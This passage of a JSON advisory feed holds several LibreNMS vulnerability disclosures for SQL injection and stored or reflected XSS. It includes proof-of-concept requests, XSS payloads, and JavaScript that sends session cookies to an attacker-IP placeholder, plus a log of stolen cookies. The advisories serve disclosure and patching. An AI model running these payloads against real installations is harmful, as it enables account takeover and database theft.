ipv6_prefixlen = '1nd'\"'.\n\n  - The single quote ' closes the string definition in the SQL query, and the subsequent characters allow for SQL syntax manipulation.\n\nReproduction Steps:\n\n1. Access the application instance.\n\n2. Send the following request (adjusting the host as necessary):\n```\nPOST /ajax_table.php HTTP/1.1\nHost: localhost\nid=address-search\u0026search_type=ipv6\u0026address=snow/1nd'\" \n```\n### Impact\nThis vulnerability allows an attacker to execute arbitrary SQL queries against the database.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-02-18T22:30:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv","https://github.com/librenms/librenms/pull/18777","https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1","https://github.com/advisories/GHSA-h3rv-q4rq-pqcv"],"source_kind":"github","identifiers":["GHSA-h3rv-q4rq-pqcv","CVE-2026-26988"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-18T23:00:08.056Z","updated_at":"2026-09-03T00:04:11.207Z","epss_percentage":0.0744,"epss_percentile":0.93657,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oM3J2LXE0cnEtcHFjds4ABSgc","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oM3J2LXE0cnEtcHFjds4ABSgc","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.2.0","vulnerable_version_range":"\u003c 26.2.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oM3J2LXE0cnEtcHFjds4ABSgc/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mcXg2LTY5M2MtZjU1Z84ABSgb","url":"https://github.com/advisories/GHSA-fqx6-693c-f55g","title":"LibreNMS has a Stored XSS in Custom OID - unit parameter missing strip_tags()","description":"### Summary\nThe `unit` parameter in Custom OID functionality lacks `strip_tags()` sanitization while other fields (`name`, `oid`, `datatype`) are sanitized. The unsanitized value is stored in the database and rendered without HTML escaping, allowing Stored XSS.\n\n### Details\n**Vulnerable Input Processing (`includes/html/forms/customoid.inc.php` lines 18-21):**\n```php\n$name = strip_tags((string) $_POST['name']);       // line 18 - SANITIZED\n$oid = strip_tags((string) $_POST['oid']);         // line 19 - SANITIZED\n$datatype = strip_tags((string) $_POST['datatype']);  // line 20 - SANITIZED\n$unit = $_POST['unit'];                            // line 21 - NOT SANITIZED!\n```\n\n**Vulnerable Output (`graphs/customoid.inc.php` lines 13-20):**\n```php\n$customoid_unit = $customoid['customoid_unit'];  // Retrieved from DB\n$customoid_current = \\LibreNMS\\Util\\Number::formatSi(...) . $customoid_unit;\necho \"...$customoid_current...\";  // ECHOED WITHOUT ESCAPING!\n```\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nXSS test for LibreNMS Custom OID - unit parameter\n\"\"\"\n\nimport html as html_module\nimport re\n\ndef strip_tags(value):\n    return re.sub(r'\u003c[^\u003e]*?\u003e', '', str(value))\n\n# Simulate form processing (customoid.inc.php lines 18-21)\ntest_inputs = {\n    'name': '\u003cscript\u003ealert(1)\u003c/script\u003eTest OID',\n    'oid': '1.3.6.1.4.1.2021.10.1.3.1',\n    'datatype': 'GAUGE',\n    'unit': '\u003cscript\u003ealert(\"XSS\")\u003c/script\u003e',\n}\n\nname = strip_tags(test_inputs['name'])      # Sanitized\noid = strip_tags(test_inputs['oid'])        # Sanitized\ndatatype = strip_tags(test_inputs['datatype'])  # Sanitized\nunit = test_inputs['unit']                   # NOT SANITIZED!\n\nprint(\"Input Processing Analysis:\")\nprint(f\"  name (strip_tags):     {name}\")\nprint(f\"  oid (strip_tags):      {oid}\")\nprint(f\"  datatype (strip_tags): {datatype}\")\nprint(f\"  unit (NO strip_tags):  {unit}\")\nprint()\nprint(\"*** VULNERABILITY: 'unit' parameter has NO strip_tags()! ***\")\n\n# Test XSS payloads\npayloads = [\n    '\u003cscript\u003ealert(\"XSS\")\u003c/script\u003e',\n    '\u003cimg src=x onerror=alert(1)\u003e',\n    '\u003csvg onload=alert(1)\u003e',\n]\n\nprint(\"\\nXSS Payload Tests:\")\nfor payload in payloads:\n    escaped = html_module.escape(payload)\n    has_xss = '\u003cscript\u003e' in payload or 'onerror=' in payload.lower()\n    print(f\"  Payload: {payload}\")\n    print(f\"    Raw (vulnerable): Contains executable code: {has_xss}\")\n    print(f\"    Escaped (safe):   {escaped}\")\n```\n\n### Expected Output\n\n```\nInput Processing Analysis:\n  name (strip_tags):     alert(1)Test OID\n  oid (strip_tags):      1.3.6.1.4.1.2021.10.1.3.1\n  datatype (strip_tags): GAUGE\n  unit (NO strip_tags):  \u003cscript\u003ealert(\"XSS\")\u003c/script\u003e\n\n*** VULNERABILITY: 'unit' parameter has NO strip_tags()! ***\n```\n### Impact\n- **Attack Vector:** User with device edit permissions sets malicious Unit value\n- **Exploitation:** XSS payload stored in database, executes for all users viewing device graphs\n- **Consequences:**\n  - Session hijacking via cookie theft\n  - Admin account takeover\n  - Malicious actions on behalf of victims\n  - Persistent attack affecting all users\n- **Affected Users:** All LibreNMS installations with Custom OID feature","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-02-18T22:08:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-fqx6-693c-f55g","https://github.com/librenms/librenms/pull/19040","https://github.com/librenms/librenms/commit/3bea263e02441690c01dea7fa3fe6ffec94af335","https://github.com/librenms/librenms/releases/tag/26.2.0","https://nvd.nist.gov/vuln/detail/CVE-2026-27016","https://github.com/advisories/GHSA-fqx6-693c-f55g"],"source_kind":"github","identifiers":["GHSA-fqx6-693c-f55g","CVE-2026-27016"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-18T23:00:08.056Z","updated_at":"2026-09-03T00:04:11.207Z","epss_percentage":0.00227,"epss_percentile":0.13236,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mcXg2LTY5M2MtZjU1Z84ABSgb","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mcXg2LTY5M2MtZjU1Z84ABSgb","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.2.0","vulnerable_version_range":"\u003e= 24.10.0, \u003c 26.2.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mcXg2LTY5M2MtZjU1Z84ABSgb/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05M2Z4LWc3NDctNjk1eM4ABSga","url":"https://github.com/advisories/GHSA-93fx-g747-695x","title":"LibreNMS /port-groups name Stored Cross-Site Scripting","description":"### Summary\n**/port-groups name Stored Cross-Site Scripting**\n\n- HTTP POST\n- Request-URI(s): \"/port-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a port group, an HTTP POST request is sent to the Request-URI \"/port-groups\". The name of the newly created port group is stored in the value of the name parameter.\n- After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.\n\n### Details\nThe vulnerability exists as the name of the port group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/port-group/index.blade.php:_\n```\n@extends('layouts.librenmsv1')\n@section('title', __('Port Groups'))\n@section('content')\n\u003cdiv class=\"container-fluid\"\u003e\n\u003cx-panel id=\"manage-port-groups-panel\"\u003e\n// [...Truncated...]\n@foreach($port_groups as $port_group)\n// [...Truncated...]\n\n\u003cbutton type=\"button\" class=\"btn btn-danger btn-\nsm\" title=\"{{ __('delete Port Group') }}\" aria-label=\"{{ __('Delete') }}\"\n\nonclick=\"delete_pg(this, '{{ $port_group-\n\u003ename }}', '{{ route('port-groups.destroy', $port_group-\u003eid) }}')\"\u003e // using the\nport's name in the Delete button functionality without sanitizing for XSS related\ncharacters/strings\n```\n\nAs the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored\ncross-site scripting.\n\n### PoC\n- Login\n- Select Ports \u003e Manage Port Groups\n- Select New Port Group\n- Input `12345');varpt=newImage();pt.src='http://\u003cATTACKER_IP\u003e/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the \"Name\" input box (change \u003cATTACKER_IP\u003e to be an the IP of an attacker controlled webserver)`\n- Select Save\n- Select the Delete Icon for the newly created Port Group\n- Select OK\n- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled server, leaking the user's cookies.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-02-18T22:07:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-93fx-g747-695x","https://github.com/librenms/librenms/pull/19042","https://github.com/librenms/librenms/commit/882fe6f90ea504a3732f83caf89bba7850a5699f","https://github.com/librenms/librenms/releases/tag/26.2.0","https://nvd.nist.gov/vuln/detail/CVE-2026-26992","https://github.com/advisories/GHSA-93fx-g747-695x"],"source_kind":"github","identifiers":["GHSA-93fx-g747-695x","CVE-2026-26992"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-18T23:00:08.056Z","updated_at":"2026-09-03T00:04:11.208Z","epss_percentage":0.00216,"epss_percentile":0.11923,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05M2Z4LWc3NDctNjk1eM4ABSga","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05M2Z4LWc3NDctNjk1eM4ABSga","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.2.0","vulnerable_version_range":"\u003c 26.2.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05M2Z4LWc3NDctNjk1eM4ABSga/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01cHFmLTU0cXAtMzJ3eM4ABSgZ","url":"https://github.com/advisories/GHSA-5pqf-54qp-32wx","title":"LibreNMS /device-groups name Stored Cross-Site Scripting","description":"### Summary\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.\n\n### Details\nThe vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/device-group/index.blade.php:_\n```\n@section('title', __('Device Groups'))\n@section('content')\n\u003cdiv class=\"container-fluid\"\u003e\n\u003cx-panel id=\"manage-device-groups-panel\"\u003e\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n\u003cbutton type=\"button\" class=\"btn btn-danger btn-\nsm\" title=\"{{ __('delete Device Group') }}\" aria-label=\"{{ __('Delete') }}\"\nonclick=\"delete_dg(this, '{{$device_group-\u003ename }}', '{{ route('device-groups.destroy', $device_group-\u003eid)\n}}')\"\u003e // using the device's name in the Delete button functionality without\nsanitizing for XSS related characters/strings\n```\n\nAs the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored\ncross-site scripting.\n\n### PoC\n- Login\n- Select Devices \u003e Manage Groups\n- Select New Device Group\n- Input 12345');var pt=new Image();pt.src='http://\u003cATTACKER_IP\u003e/cookie-\n- '.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345 into\n- the \"Name\" input box (change \u003cATTACKER_IP\u003e to be an the IP of an attacker controlled webserver)\n- Select \"access_points.accesspoint_id\" as the Conditional input\n- Input 1 into the Conditional value input box\n- Select Save\n- Select the Delete Icon for the newly created Device Group\n- Select OK\n- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled\n- server, leaking the user's cookies.\n\n### Impact\nAttacker Controlled server's logs:\n```\n192.168.1.96 - - [10/Feb/2026:13:32:25 -0600] \"GET /cookie-\njqCookieJar_options=%7B%7D;%20SWIFT_cookieconsent=dismiss;%20CookieAuth=%5B%22emai\n\nl%40email.c.com%22%2C%22%242y%2410%24zI.%5C%2F5BHghPssddSOjH6.Eek%5C%2F0hQNm8DewYh\n\nLnQxXHlpw3abw4C74y%22%5D;%20XSRF-\nTOKEN=eyJpdiI6InkrSlpHNFZ3TjRXbXl5clQ2ZVBHOFE9PSIsInZhbHVlIjoiZTROUHRCcGhYRGU4dVJL\n\nZ2RUUTZ5VXlGZElMNjZoT0E2cGRNZzVDRmtVWTg5YTBGNzdpTU83YU1EZ3E3Tk1BTm5tNjYxTExUV1Z0Mj\nBLNUlqOVl4MlpGL21xdHh3MUJwYm1zT1RaQXJwR0w5YmVXTkdKQWNXUkNvL1J2SzVtcWMiLCJtYWMiOiI0\nZTc4YjVmMjhiYjc3YTA2MDI5NjJkOTgzMTJlYmVkNGVhOTg0ZjE4ZjRlMzY1NmFlMjNiNmUyNzhlN2QwOG\nI4IiwidGFnIjoiIn0%3D HTTP/1.1\" 404 492 \"http://192.168.1.121/\" \"Mozilla/5.0\n(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\nChrome/144.0.0.0 Safari/537.36\"\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-02-18T22:07:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx","https://github.com/librenms/librenms/pull/19041","https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c","https://github.com/librenms/librenms/releases/tag/26.2.0","https://nvd.nist.gov/vuln/detail/CVE-2026-26991","https://github.com/advisories/GHSA-5pqf-54qp-32wx"],"source_kind":"github","identifiers":["GHSA-5pqf-54qp-32wx","CVE-2026-26991"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-18T23:00:08.056Z","updated_at":"2026-09-03T00:04:11.209Z","epss_percentage":0.00216,"epss_percentile":0.11901,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01cHFmLTU0cXAtMzJ3eM4ABSgZ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01cHFmLTU0cXAtMzJ3eM4ABSgZ","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.2.0","vulnerable_version_range":"\u003c 26.2.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01cHFmLTU0cXAtMzJ3eM4ABSgZ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ncXg3LTk5anctNmZwcs4ABSgY","url":"https://github.com/advisories/GHSA-gqx7-99jw-6fpr","title":"LibreNMS affected by reflected xss via email field ","description":"### Summary\nreflected xss via email field \n\n### Details\n 1. visit `http://127.0.0.1/settings/alerting/email`\n 2. in the email address input but this payload \n `\u003cimg src=1 onerror=alert(document.cookie)\u003e` \n3. notice the alert \n### PoC\n- video attached with the report\nhttps://github.com/user-attachments/assets/c1b443f5-85c6-4545-b04f-def06d82b42e\n\n\n### Impact\ncan lead to ATO","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-02-18T22:07:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-gqx7-99jw-6fpr","https://github.com/librenms/librenms/pull/19038","https://github.com/librenms/librenms/commit/8e626b38ef92e240532cdac2ac7e38706a71208b","https://github.com/librenms/librenms/releases/tag/26.2.0","https://nvd.nist.gov/vuln/detail/CVE-2026-26987","https://github.com/advisories/GHSA-gqx7-99jw-6fpr"],"source_kind":"github","identifiers":["GHSA-gqx7-99jw-6fpr","CVE-2026-26987"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-18T23:00:08.056Z","updated_at":"2026-09-03T00:04:11.209Z","epss_percentage":0.00291,"epss_percentile":0.21047,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ncXg3LTk5anctNmZwcs4ABSgY","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ncXg3LTk5anctNmZwcs4ABSgY","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.2.0","vulnerable_version_range":"\u003c 26.2.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ncXg3LTk5anctNmZwcs4ABSgY/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xcDJqLXY1amctaGc2OM4ABRnp","url":"https://github.com/advisories/GHSA-qp2j-v5jg-hg68","title":"LibreNMS contains an authenticated SQL Injection vulnerability","description":"LibreNMS 1.46 contains an authenticated SQL Injection vulnerability in the MAC accounting graph endpoint that allows remote attackers to extract database information. Attackers can exploit the vulnerability by manipulating the 'sort' parameter with crafted SQL Injection techniques to retrieve sensitive database contents through time-based blind SQL Injection.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-27T18:32:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-36947","https://community.librenms.org","https://github.com/librenms/librenms","https://www.exploit-db.com/exploits/49246","https://www.vulncheck.com/advisories/librenms-mac-accounting-graph-authenticated-sql-injection","https://github.com/advisories/GHSA-qp2j-v5jg-hg68"],"source_kind":"github","identifiers":["GHSA-qp2j-v5jg-hg68","CVE-2020-36947"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-03T00:00:09.305Z","updated_at":"2026-09-03T00:04:19.237Z","epss_percentage":0.00415,"epss_percentile":0.3451,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcDJqLXY1amctaGc2OM4ABRnp","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xcDJqLXY1amctaGc2OM4ABRnp","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.46"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcDJqLXY1amctaGc2OM4ABRnp/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jODlmLThnN2ctNTl3as4ABQFG","url":"https://github.com/advisories/GHSA-c89f-8g7g-59wj","title":"LibreNMS Alert Rule API Cross-Site Scripting Vulnerability","description":"Please find POC file here https://trendmicro-my.sharepoint.com/:u:/p/kholoud_altookhy/IQCfcnOE5ykQSb6Fm-HFI872AZ_zeIJxU-3aDk0jh_eX_NE?e=zkN76d\n\nZDI-CAN-28575: LibreNMS Alert Rule API Cross-Site Scripting Vulnerability\n\n-- CVSS -----------------------------------------\n\n4.3: AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L\n\n-- ABSTRACT -------------------------------------\n\nTrend Micro's Zero Day Initiative has identified a vulnerability affecting the following products:\nLibreNMS - LibreNMS\n\n-- VULNERABILITY DETAILS ------------------------\n* Version tested:  25.10.0\n* Installer file:  NA\n* Platform tested: NA\n\n---\n\n### Analysis\n\nLibreNMS Alert Rule API Stored Cross-Site Scripting\n\n# Overview\nAlert rules can be created or updated via LibreNMS API. The alert rule name is not properly sanitized, and can be used to inject HTML code.\n\n# Affected versions\nThe latest version at the time of writing (25.10.0) is vulnerable.\n\n# Root cause\nWhen an alert rule is created or updated via the API, function `add_edit_rule()` in `includes/html/api_functions.inc.php` is called to add/update the entry in the database. When an alert rule is created via the web interface, HTML tags are stripped from the rule name, however this is not the case when using the API.\n\nAs such, it is possible to create an alert rule where the name is:\n```\n\u003cscript\u003ealert(1)\u003c/script\u003e\n```\n\nLater, when a victim browses to the Alerts \u003e Alert Rule page, PHP script\\xc2\\xa0`includes/html/print-alert/rules.php`\\xc2\\xa0is called. It notably includes the file\\xc2\\xa0`includes/html/modal/alert_rule_list.inc.php`, which returns HTML code for a modal window that searches alert rules.\n\nThe modal window includes an HTML table with all rules, including their name, and an inline JavaScript that calls the\\xc2\\xa0`bootgrid()`\\xc2\\xa0function ([http://www.jquery-bootgrid.com/](http://www.jquery-bootgrid.com/)) for styling and enhancing the table.\n\n`alert_rule.list.inc.php` sanitizes the rule name with the function `e()` before including it in the table, which XML encodes all special characters. However the\\xc2\\xa0`bootgrid()`\\xc2\\xa0function rewrites the table cells content when enhancing the table, and as a side effect, XML character references are decoded. After the script updated the table, the browser now interprets the payload as HTML tags and includes the code to the DOM.\n\n# Detection guidance\n- inspect HTTP POST and PUT requests to a Request-URI that includes the string\\xc2\\xa0`/api/v0/rules`\n- check if the\\xc2\\xa0`name`\\xc2\\xa0JSON value includes a `\u003c` character\n\n# PoC\nThe proof-of-concept can be run as such:\n```\npython3 poc.py ip_addr -T \u003ctoken\u003e\n```\n\n\n-- CREDIT ---------------------------------------\nThis vulnerability was discovered by:\nSimon Humbert of Trend Research of Trend Micro\n\n-- FURTHER DETAILS ------------------------------\n\nSupporting files:\n\n\nIf supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.\n\nPlease confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:\n\nZero Day Initiative\nzdi-disclosures@trendmicro.com\n\nThe PGP key used for all ZDI vendor communications is available from:\n\n  http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc\n\n-- INFORMATION ABOUT THE ZDI --------------------\nEstablished by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.\n\nPlease contact us for further details or refer to:\n\n  http://www.zerodayinitiative.com\n\n-- DISCLOSURE POLICY ----------------------------\n\nOur vulnerability disclosure policy is available online at:\n\n  http://www.zerodayinitiative.com/advisories/disclosure_policy/","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-12-23T18:19:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-c89f-8g7g-59wj","https://nvd.nist.gov/vuln/detail/CVE-2025-68614","https://github.com/librenms/librenms/commit/ebe6c79bf4ce0afeb575c1285afe3934e44001f1","https://github.com/advisories/GHSA-c89f-8g7g-59wj"],"source_kind":"github","identifiers":["GHSA-c89f-8g7g-59wj","CVE-2025-68614"],"repository_url":null,"blast_radius":0.0,"created_at":"2025-12-23T19:00:10.769Z","updated_at":"2026-09-03T00:04:39.082Z","epss_percentage":0.03941,"epss_percentile":0.89554,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jODlmLThnN2ctNTl3as4ABQFG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jODlmLThnN2ctNTl3as4ABQFG","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"25.12.0","vulnerable_version_range":"\u003c 25.12.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jODlmLThnN2ctNTl3as4ABQFG/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02cG1qLXhqeHAtcDhnOc4ABOqL","url":"https://github.com/advisories/GHSA-6pmj-xjxp-p8g9","title":"LibreNMS is vulnerable to SQL Injection (Boolean-Based Blind) in hostname parameter in ajax_output.php endpoint","description":"## Summary\n\nA **Boolean-Based Blind SQL Injection** vulnerability was identified in the LibreNMS application at the `/ajax_output.php` endpoint. The `hostname` parameter is interpolated directly into an SQL query without proper sanitization or parameter binding, allowing an attacker to manipulate the query logic and infer data from the database through conditional responses.\n\n---\n\n## Details\n\n- **Vulnerable Endpoint:** `GET /ajax_output.php\n   \n- **Parameter:** `hostname`\n\n- **Authentication Required:** Admin privileges required to access `/ajax_output.php` discovery endpoint\n\n- **Vulnerability type:** Boolean-Based Blind SQL Injection — input is concatenated into a SQL statement without proper escaping\n\n---\n\n## Description\n\nThe LibreNMS application uses the `hostname` parameter during device discovery operations to query the database for matching devices.  \nHowever, user-supplied data is concatenated directly into the SQL query within `/opt/librenms/includes/html/output/capture.inc.php` without adequate sanitization..\n\nThis allows attackers to modify the query logic using Boolean expressions.  \nWhen crafted conditions evaluate to **true**, the application behaves normally and returns the expected device data.  \nWhen conditions evaluate to **false**, the response is altered (e.g., the queried host is not found).\n\nThis difference in behavior confirms that the parameter’s value is being interpreted as SQL logic, demonstrating a **Boolean-Based Blind SQL Injection**.\n\nNote: This vulnerability requires an authenticated user with **administrator privileges** to access the affected discovery functionality. While this limits exploitation to internal or compromised admin sessions, the vulnerability still represents a critical security risk due to the ability to manipulate backend SQL logic in privileged contexts.\n\n---\n\n## Proof of Concept (PoC)\n\n1 - **Authenticate with an administrator account.**  \nThe discovery endpoint `/ajax_output.php` is accessible only to users with admin-level privileges.\n\n2 - Access the following URL with the payload that evaluates to `TRUE`:\n\n```\nGET /ajax_output.php?id=capture\u0026format=text\u0026type=discovery\u0026hostname=10.0.5.4'+AND+1=1+AND+'1'='1 HTTP/1.1\nHost: 10.0.5.5:8000\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: keep-alive\nReferer: http://10.0.5.5:8000/device/3/capture\nCookie: laravel_session=[ADMIN_SESSION_COOKIE]\nPriority: u=0\n```\n\n3 - Observe that the system returns the expected data and triggers the discovery process.\n\n\u003cimg width=\"1507\" height=\"666\" alt=\"image\" src=\"https://github.com/user-attachments/assets/584e871a-a01a-4bad-8e09-c6dcb0e6cd1d\" /\u003e\n\n4 - Now repeat the request with a `FALSE` condition:\n\n```\nGET /ajax_output.php?id=capture\u0026format=text\u0026type=discovery\u0026hostname=10.0.5.4'+AND+1=2+AND+'1'='1 HTTP/1.1\nHost: 10.0.5.5:8000\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: keep-alive\nReferer: http://10.0.5.5:8000/device/3/capture\nCookie: laravel_session=[SESSION COOKIE]\nPriority: u=0\n```\n\n5 - Observe that the response is altered: no device is found, and no discovery is triggered.\n\n\u003cimg width=\"1496\" height=\"662\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b7d227bd-0a37-4589-81b6-26cca5135837\" /\u003e\n\n### Query behavior observed in logs\n\n``SQL[SELECT * FROM `devices` WHERE disabled = 0 AND `hostname` LIKE '10.0.5.4' AND 1=1 AND '1'='1' ORDER BY device_id DESC [] 0.5ms]``\n\nThe difference in output confirms that the injected Boolean logic is being executed by the database.\n\n---\n\n## Impact\n\nBoolean-based SQL Injection can have severe consequences depending on the deployment context:\n\n- **Data extraction:** Attackers can infer database data (schema, users, configuration) through Boolean inference techniques.\n    \n- **System compromise:** Database or application state could be manipulated if the injection is further exploited.\n    \n- **Information disclosure:** Reveals internal SQL structure and logic of the LibreNMS backend.\n    \n\n---\n\n## References\n\n- CWE-89 — Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)\n    \n- OWASP SQL Injection Prevention Cheat 